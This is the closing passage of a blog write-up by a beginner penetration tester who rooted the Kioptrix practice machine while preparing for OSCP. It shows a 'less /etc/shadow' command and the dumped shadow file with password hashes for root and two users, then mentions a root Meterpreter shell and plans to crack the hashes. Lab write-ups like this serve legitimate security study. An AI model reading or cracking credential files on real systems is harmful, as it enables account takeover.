radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
less /etc/shadow
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::
sync:*:14513:0:99999:7:::
shutdown:*:14513:0:99999:7:::
halt:*:14513:0:99999:7:::
mail:*:14513:0:99999:7:::
news:*:14513:0:99999:7:::
uucp:*:14513:0:99999:7:::
operator:*:14513:0:99999:7:::
games:*:14513:0:99999:7:::
gopher:*:14513:0:99999:7:::
ftp:*:14513:0:99999:7:::
nobody:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
rpm:!!:14513:0:99999:7:::
xfs:!!:14513:0:99999:7:::
rpc:!!:14513:0:99999:7:::
rpcuser:!!:14513:0:99999:7:::
nfsnobody:!!:14513:0:99999:7:::
nscd:!!:14513:0:99999:7:::
ident:!!:14513:0:99999:7:::
radvd:!!:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
squid:!!:14513:0:99999:7:::
pcap:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::

And we got ROOT!

We are able to get meterpreter shell with root access, able to read and dump the /etc/passwd and /etc/shadow files, we can try use password crackin to get the users and root password.

There’s a lot I learned about this machine, since I was just a starting student of infosec, I really enjoyed the machine, although it was easy and boring for our hacking heroes, I enjoyed the enumeration part where I got to have more than 1 possible exploit. I also learned about staged and stageless payload in metasploit, and although metasploit is discouraged among OSCP takers, I am slowly learning my way on manual exploits and will post my manual hacking in the future.

Feel free to add pointers, methodology or anything I miss, I would really glad to add more on my arsenals as I prepare my way to OSCP. Also please point out anything I did wrong or anything I can improve upon.

Alright! ;)

Kioptrix
Penetration Testing
Information Security
Hacking

--

--

mrZud0k0rn
mrZud0k0rn

Written by mrZud0k0rn

5 Followers
2 Following

“He-who-must-NOT-be-named”

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams